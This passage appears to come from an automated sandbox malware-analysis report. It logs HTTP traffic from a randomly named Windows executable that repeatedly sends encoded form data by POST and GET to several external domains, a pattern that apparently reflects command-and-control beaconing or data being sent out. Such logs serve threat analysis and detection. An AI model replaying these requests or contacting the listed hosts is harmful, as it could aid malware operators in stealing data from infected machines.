                                                      Data Ascii: pP_8=+O2xfQVLDeWjYEoe/rDXsqlfcfRv/p3zNiO5XX94gkEECxkCrYNctXobucivBwGZfCM6to1fTHFKT4UmCNeD+R0exYq2anzkqJOnp02F2/NzUePd2eZ9J58qNpuBFWtObkPOEJLPzn8cZJ+VAciIgW37+o0MUchQimuxD0zJsbYjxJRJrLU2QuxSB7oyUWRNn2etTU2cse1H85/HU16kiHbzQvhYgNFUQXceXP89cShREmm376fApQ+KyqIH7rOLjTeXNl9BoWnERuCXZqpm8kbW/YNqeWppHUC2z9BmD3bIIUyYMZ4xwzs1PzqpYEyvvMyb8zhrBc99Gi947CyIwqDA0v/MnABM6jDlCpv2c8Wc3/fGpQUFFVfXVdt+UXFKl0iWOcwEnO1tapsKxTEsZUvJbkceg8lYrwRgdKcw+sudFTFXuJV2WgND5x3eC4YhblJpiHUG2jTvxGoVeEBS78ezf4sG4nK3wWKJMOqF4DD2rD8X5EKSoGuWam0E2p4v4lW5r9u4e1s23Mq9KQcCu8sh88MKIpeG1h0cyc+eTmGMTwp6dNQf4YxboEH3FzGlZgPf7fCmCQ7xMI5cYgdylR8xEBhV1qag1DQcShaahRptAYtfwUpDoFl+MXdCYqPzHTastKFGKmNj1uE8zcgeByDXHvEVdLfaXIQRYQtpPEE+Cvhr3VFjlrLZEXsEeHTGFWR6A0GGIoCTasdCODC8qPhWVkw8L5KxbaGDFp7An6/0UG1kfVW9UXMRt90jKlkcjGkrn/uSOLkJcHgMfTz3kCHOqcfPZVPuwUo32hiGY0eTfpXgazTf//vdMCCpbGG7cNS/9w/xmhhxay5VWkTxH1bKpMxGm42D7yRHg3owN9u8PQqdxX1V28GAR1UX21ONOaocmhQaO8UmrNGrIBY059lp7VFYgH7dzfdMKctDBmLnophvxKfjesCWr7wp7NxCGB/q7gR7sHwzSVskzxaK70hk7dZAaIFytXDWClX8Exr6prp [TRUNCATED]
                                                      Sep 11, 2024 11:18:40.343519926 CEST1236OUTData Raw: 6f 48 6b 66 70 4a 48 32 54 38 42 61 31 34 6a 58 31 37 4c 48 71 38 50 75 36 4b 33 44 47 30 72 4c 75 78 66 65 34 67 6b 4e 64 56 37 73 2b 6f 36 48 70 4f 74 38 44 6c 2f 50 63 4f 4a 66 45 30 77 73 63 4e 6f 4a 66 4c 64 6e 6f 4c 4a 79 78 30 49 41 51 2b
                                                      Data Ascii: oHkfpJH2T8Ba14jX17LHq8Pu6K3DG0rLuxfe4gkNdV7s+o6HpOt8Dl/PcOJfE0wscNoJfLdnoLJyx0IAQ+7p2GxiyI9fHMItpo/Jl1rGKwkf4uMpf5liim355O2p+HxxGoeSTCPI5YDH3ppsFfWW8ERznodaswKKTQy7p1nZFrkWLhjkTxZgKdCr+qvZXGgR9qQTKY6Bu8KqAnjMLXjUUjlZ7eq8n56W5Djjc67W9JximqoUDSs
                                                      Sep 11, 2024 11:18:41.205226898 CEST357INHTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 11 Sep 2024 09:18:41 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Location: https://www.63582.photo/5o7d/
                                                      Server: 8080
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      20192.168.2.463336147.92.40.175803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:18:42.857403994 CEST498OUTGET /5o7d/?pP_8=zMeRclQqEZ6cHEksxL2258xeQPEFk6LXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGduAov/pmUDz/4soHslE7c+cNQZpL9+8t0WKA=&V0Qh=4pBta8 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.63582.photo
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Sep 11, 2024 11:18:43.805891991 CEST495INHTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 11 Sep 2024 09:18:43 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Location: https://www.63582.photo/5o7d/?pP_8=zMeRclQqEZ6cHEksxL2258xeQPEFk6LXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGduAov/pmUDz/4soHslE7c+cNQZpL9+8t0WKA=&V0Qh=4pBta8
                                                      Server: 8080
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      21192.168.2.4633373.33.130.190803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:18:48.849874020 CEST784OUTPOST /68ac/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.useanecdotenow.tech
                                                      Origin: http://www.useanecdotenow.tech
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.useanecdotenow.tech/68ac/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 5a 66 34 78 51 4c 74 58 62 38 68 4b 6d 64 67 6d 7a 6e 54 4f 65 66 4f 43 35 5a 36 30 4a 33 62 56 46 6e 64 58 34 38 42 72 61 49 6c 6d 6d 35 71 33 6d 67 78 76 57 59 45 7a 38 6b 37 36 62 68 6d 75 46 50 31 69 4a 2b 45 79 66 44 72 45 35 64 31 34 52 2f 45 2f 2f 48 2f 39 57 5a 65 79 71 49 52 2f 62 55 51 69 46 6a 77 6e 45 38 6d 34 34 6a 69 69 61 71 76 53 2f 2f 73 4f 75 72 58 4c 73 34 30 72 34 6a 37 78 59 46 77 6e 37 79 36 62 52 35 57 64 50 57 41 2f 55 43 78 4f 34 45 6f 42 33 69 50 6e 6c 38 62 58 38 6b 55 59 68 6a 48 79 66 72 33 6c 52 73 69 72 65 6a 54 56 73 64 4c 61 4c 78 48 44 46 67 3d 3d
                                                      Data Ascii: pP_8=Zf4xQLtXb8hKmdgmznTOefOC5Z60J3bVFndX48BraIlmm5q3mgxvWYEz8k76bhmuFP1iJ+EyfDrE5d14R/E//H/9WZeyqIR/bUQiFjwnE8m44jiiaqvS//sOurXLs40r4j7xYFwn7y6bR5WdPWA/UCxO4EoB3iPnl8bX8kUYhjHyfr3lRsirejTVsdLaLxHDFg==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      22192.168.2.4633383.33.130.190803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:18:51.389895916 CEST804OUTPOST /68ac/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.useanecdotenow.tech
                                                      Origin: http://www.useanecdotenow.tech
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.useanecdotenow.tech/68ac/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 5a 66 34 78 51 4c 74 58 62 38 68 4b 6e 35 63 6d 32 46 37 4f 57 66 4f 44 6c 70 36 30 41 58 62 4a 46 6d 68 58 34 39 45 6d 61 62 52 6d 6c 62 79 33 6e 68 78 76 62 34 45 7a 6b 30 37 37 59 52 6d 66 46 50 78 4d 4a 36 45 79 66 44 2f 45 35 5a 78 34 57 4d 73 38 38 33 2f 7a 62 35 65 30 33 59 52 2f 62 55 51 69 46 6a 6b 42 45 38 65 34 34 79 79 69 62 4f 37 64 68 76 73 42 2b 62 58 4c 39 49 30 76 34 6a 36 63 59 45 73 4e 37 78 4f 62 52 35 6d 64 50 46 59 34 61 79 77 46 31 6b 70 78 35 54 75 4e 76 73 6a 58 2b 6e 38 72 69 42 50 51 58 4e 6d 2f 41 64 44 38 4d 6a 33 6d 78 61 43 75 47 79 36 4b 65 6b 4e 41 73 54 45 52 58 52 63 39 4a 73 52 66 64 48 6f 4d 57 2f 4d 3d
                                                      Data Ascii: pP_8=Zf4xQLtXb8hKn5cm2F7OWfODlp60AXbJFmhX49EmabRmlby3nhxvb4Ezk077YRmfFPxMJ6EyfD/E5Zx4WMs883/zb5e03YR/bUQiFjkBE8e44yyibO7dhvsB+bXL9I0v4j6cYEsN7xObR5mdPFY4aywF1kpx5TuNvsjX+n8riBPQXNm/AdD8Mj3mxaCuGy6KekNAsTERXRc9JsRfdHoMW/M=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      23192.168.2.4633393.33.130.190803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:18:53.935519934 CEST10886OUTPOST /68ac/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.useanecdotenow.tech
                                                      Origin: http://www.useanecdotenow.tech
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.useanecdotenow.tech/68ac/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 5a 66 34 78 51 4c 74 58 62 38 68 4b 6e 35 63 6d 32 46 37 4f 57 66 4f 44 6c 70 36 30 41 58 62 4a 46 6d 68 58 34 39 45 6d 61 61 70 6d 6c 75 75 33 6d 43 5a 76 61 34 45 7a 36 6b 37 6d 59 52 6d 34 46 50 4a 41 4a 36 42 4a 66 42 48 45 34 38 6c 34 54 39 73 38 6e 6e 2f 7a 48 4a 65 31 71 49 52 71 62 53 78 72 46 6a 30 42 45 38 65 34 34 78 36 69 62 61 76 64 6a 76 73 4f 75 72 58 35 73 34 30 48 34 67 4b 69 59 45 6f 33 36 43 57 62 51 5a 32 64 43 58 41 34 63 69 77 48 79 6b 70 70 35 54 69 57 76 73 2b 73 2b 6d 4a 6a 69 44 54 51 54 62 4c 6c 45 2f 4c 47 4f 79 50 33 71 6f 6d 4e 49 79 75 58 62 57 49 36 74 77 67 39 50 69 59 70 50 65 45 39 4f 30 6b 4a 41 37 75 54 51 6b 4d 4e 72 57 61 38 34 4e 5a 75 71 79 33 56 45 2f 63 30 52 74 66 37 4c 52 41 48 78 77 4b 47 76 4b 73 4f 62 31 45 32 57 52 4b 7a 69 5a 59 68 73 72 6b 7a 30 48 6e 66 51 7a 62 6d 39 44 41 79 2b 5a 64 63 6d 48 4a 67 4c 48 6f 57 67 39 4b 6e 74 79 32 45 69 52 79 35 7a 58 74 6c 79 41 52 36 37 31 43 37 52 67 50 70 6d 46 55 2b 78 4c 70 33 74 63 69 4a 71 [TRUNCATED]
                                                      Data Ascii: pP_8=Zf4xQLtXb8hKn5cm2F7OWfODlp60AXbJFmhX49Emaapmluu3mCZva4Ez6k7mYRm4FPJAJ6BJfBHE48l4T9s8nn/zHJe1qIRqbSxrFj0BE8e44x6ibavdjvsOurX5s40H4gKiYEo36CWbQZ2dCXA4ciwHykpp5TiWvs+s+mJjiDTQTbLlE/LGOyP3qomNIyuXbWI6twg9PiYpPeE9O0kJA7uTQkMNrWa84NZuqy3VE/c0Rtf7LRAHxwKGvKsOb1E2WRKziZYhsrkz0HnfQzbm9DAy+ZdcmHJgLHoWg9Knty2EiRy5zXtlyAR671C7RgPpmFU+xLp3tciJqSjsGej2tH3uQcm/3KbVRYJD7tjKT0cJUtL2pms+5LtJCrc0OfA+MUHwv41/5XI032gp/MUv9VusW49e0THgUT9qpmOdEtbILnFappQ5emgU3lmLfbcsDP1MRXmj7Pabi9zqrsQbzFcT0uqiFqWmfI9DB1dPHnsjj30zJjbgmd4AeSyFeXg3SJk8gzeu5DGKL7jiZ3l9yKfEjcxV1eY1Tx3EINsv7+ZFc13UYqvwLxV18fYWXp4VfstToynSlI5b/GLQKr082URP6F2emANYnxvY5E+6hu0LIUWu3FWD/Uct4lYZKaqqZqF8dDccw4nWLiN0uYqwsM1tUN02xctTGgvS7/4a+ZgVybiz0ryIRxrTXMWDKsFAADcw5wHrJ97uhDYtWhwzUg387EJ2DAW2JXvSIc2sZfASgDz02jPTZFhh8h8VyaMZhbfxRwQ6/WncuvWPnx5ET5+s1PSiqztwJk9o8Jy0AtnfobLri9euIRFYWQyGrBqEvOZb5ptVTHp2dBFFSy39KjT3/re0SKx/1890VRS5knuyQMRYpv8fF3ht/3UFQA0QeTzOI6ZgQY804qGYN+aDGC1eDW8upWpL2E70Gmy/wanQduNIuc/lEEAAA/BJAWgWD0yYonLU3OCjHfQZWsoDJUDqjP+KCFAYdiXw3SjYIpQ9beF [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      24192.168.2.4633403.33.130.190803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:18:56.482244968 CEST506OUTGET /68ac/?V0Qh=4pBta8&pP_8=UdQRT8UlMLNCwpgj6kWQKKLq7pbVYmfVdUpnkoxSG75WqbyVgEBEWfcixBuHZAqOTbF9B+kCTwT7w8BXHK8l9WrkSPCW1YJ7B21iYQxfbqK0tW+zUb3ShNU= HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.useanecdotenow.tech
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Sep 11, 2024 11:18:56.954099894 CEST392INHTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Wed, 11 Sep 2024 09:18:56 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 252
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 30 51 68 3d 34 70 42 74 61 38 26 70 50 5f 38 3d 55 64 51 52 54 38 55 6c 4d 4c 4e 43 77 70 67 6a 36 6b 57 51 4b 4b 4c 71 37 70 62 56 59 6d 66 56 64 55 70 6e 6b 6f 78 53 47 37 35 57 71 62 79 56 67 45 42 45 57 66 63 69 78 42 75 48 5a 41 71 4f 54 62 46 39 42 2b 6b 43 54 77 54 37 77 38 42 58 48 4b 38 6c 39 57 72 6b 53 50 43 57 31 59 4a 37 42 32 31 69 59 51 78 66 62 71 4b 30 74 57 2b 7a 55 62 33 53 68 4e 55 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?V0Qh=4pBta8&pP_8=UdQRT8UlMLNCwpgj6kWQKKLq7pbVYmfVdUpnkoxSG75WqbyVgEBEWfcixBuHZAqOTbF9B+kCTwT7w8BXHK8l9WrkSPCW1YJ7B21iYQxfbqK0tW+zUb3ShNU="}</script></head></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      25192.168.2.4633413.33.130.190803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:19:02.006359100 CEST784OUTPOST /kt2f/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.asiapartnars.online
                                                      Origin: http://www.asiapartnars.online
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.asiapartnars.online/kt2f/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 36 6f 67 78 63 6c 52 71 43 74 78 53 33 42 6d 39 69 4d 2b 62 67 30 34 4a 63 4f 6f 76 6e 6a 54 44 50 35 6c 48 2b 66 77 48 55 52 68 67 38 55 4e 31 42 67 6e 6c 49 52 79 6e 66 4b 42 65 50 52 4b 49 38 32 62 4a 77 33 31 36 65 67 5a 67 7a 63 49 53 6f 65 51 44 5a 35 33 36 2b 35 66 30 51 73 68 32 4d 76 67 4f 75 41 30 4e 78 57 44 32 58 69 2f 59 70 79 49 30 34 32 71 54 31 37 2b 31 33 6a 4c 7a 33 31 49 46 53 4d 51 70 53 4b 51 37 6f 62 53 61 49 4a 42 56 36 67 48 52 2b 58 34 31 44 56 63 38 65 69 6d 63 70 4f 48 51 6f 55 57 6e 68 32 66 70 6a 69 57 50 41 4a 4b 77 6e 41 6f 34 55 63 32 6b 4f 67 3d 3d
                                                      Data Ascii: pP_8=6ogxclRqCtxS3Bm9iM+bg04JcOovnjTDP5lH+fwHURhg8UN1BgnlIRynfKBePRKI82bJw316egZgzcISoeQDZ536+5f0Qsh2MvgOuA0NxWD2Xi/YpyI042qT17+13jLz31IFSMQpSKQ7obSaIJBV6gHR+X41DVc8eimcpOHQoUWnh2fpjiWPAJKwnAo4Uc2kOg==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      26192.168.2.4633423.33.130.190803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:19:04.567523956 CEST804OUTPOST /kt2f/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.asiapartnars.online
                                                      Origin: http://www.asiapartnars.online
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.asiapartnars.online/kt2f/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 36 6f 67 78 63 6c 52 71 43 74 78 53 6c 78 57 39 68 76 6d 62 78 6b 34 4b 53 75 6f 76 79 54 54 48 50 35 5a 48 2b 65 30 74 56 6a 31 67 2f 31 39 31 41 69 50 6c 45 78 79 6e 55 71 42 66 52 68 4b 58 38 32 6e 33 77 32 4a 36 65 67 4e 67 7a 65 51 53 6f 70 45 63 59 70 33 38 78 5a 65 79 65 4d 68 32 4d 76 67 4f 75 41 78 6f 78 56 7a 32 4c 43 50 59 72 51 67 37 32 57 71 51 32 37 2b 31 39 44 4c 33 33 31 4a 6f 53 4f 6b 58 53 50 4d 37 6f 66 57 61 5a 34 42 57 6a 51 48 58 36 58 35 69 4c 57 42 6d 57 79 6e 66 6f 4d 47 72 69 58 6d 65 6b 77 4f 7a 79 54 33 59 53 4a 75 44 36 48 68 4d 5a 66 4c 74 56 67 37 63 4d 71 2f 58 46 6b 62 4a 31 54 4b 76 39 75 6e 52 36 62 6f 3d
                                                      Data Ascii: pP_8=6ogxclRqCtxSlxW9hvmbxk4KSuovyTTHP5ZH+e0tVj1g/191AiPlExynUqBfRhKX82n3w2J6egNgzeQSopEcYp38xZeyeMh2MvgOuAxoxVz2LCPYrQg72WqQ27+19DL331JoSOkXSPM7ofWaZ4BWjQHX6X5iLWBmWynfoMGriXmekwOzyT3YSJuD6HhMZfLtVg7cMq/XFkbJ1TKv9unR6bo=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      27192.168.2.4633433.33.130.190803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:19:07.115612030 CEST10886OUTPOST /kt2f/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.asiapartnars.online
                                                      Origin: http://www.asiapartnars.online
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.asiapartnars.online/kt2f/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 36 6f 67 78 63 6c 52 71 43 74 78 53 6c 78 57 39 68 76 6d 62 78 6b 34 4b 53 75 6f 76 79 54 54 48 50 35 5a 48 2b 65 30 74 56 6a 74 67 38 48 31 31 42 45 48 6c 46 78 79 6e 5a 4b 42 61 52 68 4c 4c 38 32 50 37 77 32 45 50 65 6b 39 67 79 2f 77 53 75 62 38 63 54 70 33 38 70 70 66 31 51 73 67 75 4d 72 46 4a 75 44 5a 6f 78 56 7a 32 4c 41 58 59 39 53 49 37 6d 6d 71 54 31 37 2f 36 33 6a 4c 50 33 30 74 57 53 4e 4a 69 54 37 41 37 70 2f 47 61 4b 71 35 57 38 67 48 56 39 58 35 71 4c 57 4d 34 57 79 72 31 6f 4e 6a 6a 69 51 57 65 6d 6c 76 62 67 43 61 4f 4f 49 53 61 6e 31 5a 59 55 4e 76 71 4f 33 7a 7a 63 59 4c 6c 51 48 4c 6c 76 68 37 56 6f 75 50 6d 70 65 62 38 54 2b 2b 50 70 66 41 36 5a 46 70 4e 6c 74 55 42 62 32 41 74 2f 65 4b 35 47 34 5a 37 61 37 42 42 6d 70 75 55 45 6a 72 45 65 67 30 6a 49 32 67 74 34 43 31 4d 49 74 5a 31 7a 39 57 7a 31 33 7a 65 34 6d 31 76 67 6a 34 78 63 6e 51 2b 74 53 30 6b 36 48 45 66 4c 31 58 7a 6f 42 49 4f 44 62 52 79 79 70 69 55 49 6f 41 30 6a 59 31 2b 49 38 5a 42 41 43 57 69 34 [TRUNCATED]
                                                      Data Ascii: pP_8=6ogxclRqCtxSlxW9hvmbxk4KSuovyTTHP5ZH+e0tVjtg8H11BEHlFxynZKBaRhLL82P7w2EPek9gy/wSub8cTp38ppf1QsguMrFJuDZoxVz2LAXY9SI7mmqT17/63jLP30tWSNJiT7A7p/GaKq5W8gHV9X5qLWM4Wyr1oNjjiQWemlvbgCaOOISan1ZYUNvqO3zzcYLlQHLlvh7VouPmpeb8T++PpfA6ZFpNltUBb2At/eK5G4Z7a7BBmpuUEjrEeg0jI2gt4C1MItZ1z9Wz13ze4m1vgj4xcnQ+tS0k6HEfL1XzoBIODbRyypiUIoA0jY1+I8ZBACWi4m5dWujBkU9GF0P74Qfoe+u8G1w5Y8xEanV7/ljti438HEVIqky2Qy47NhI7Zy5jecn5obLXThuW3y8IseXIyoUP+Mjp8GcHgBRPsLI0ZTgfzuNDWe4Lor2p8LH0cb4EWlBTiX7wfHORArVGi2Q0y6OamLPxNPiK2ovBakbfZA3Bqy2/Pc33visfSDg7vYBUaRmLh63bTnv/e2x4A9Fa2hF1MCk5diFEaNCPkBegQ+zqUNGGLekny8GimGdHwAPQUgTcbjFddpvW48hUimPlbmXlhCI9sRmE2aS0dQfQKnqAqYmle4ALJsp4V3FhK1atgoc8+C0wBQoQuP9q0/38Z0RQTZnoPgcwakJL4AM/3P8ucBprV1mYo12U6zKlIYQh95Z3KwR1YbbQvjDxC2ofC6FJW+A3AsYTeLWKdgQ5ytOPs1EWS5pfKe67mffITAGF7kZeHFMpl3EJi7gXb/M2erkTCMeC9pQQKySCfD7hakmv4Cqq4RHeovaQgtERNJP2/5K8WFtPeDZT0iLm6yWaZ4eyOpE5fIwVRTo3J3TRh6h1kPBZTd+fq7F5uGc329SScRMt5Xs97I4HsmzoeN1QPUCxrv6dje0IqasnZMmPEU4g20Ex1J8BKGdAAW04EOGOILMYiAXk+56yCVjmEiNZ1mYku3wwKi4HXZc [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      28192.168.2.4633443.33.130.190803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:19:09.657597065 CEST506OUTGET /kt2f/?pP_8=3qIRfQl/AKdo1myUuOHVh1YjbZAZzTLYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfFJzn9v28G/J2fr9BwA1qwWv9b12erCAk53Y=&V0Qh=4pBta8 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.asiapartnars.online
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
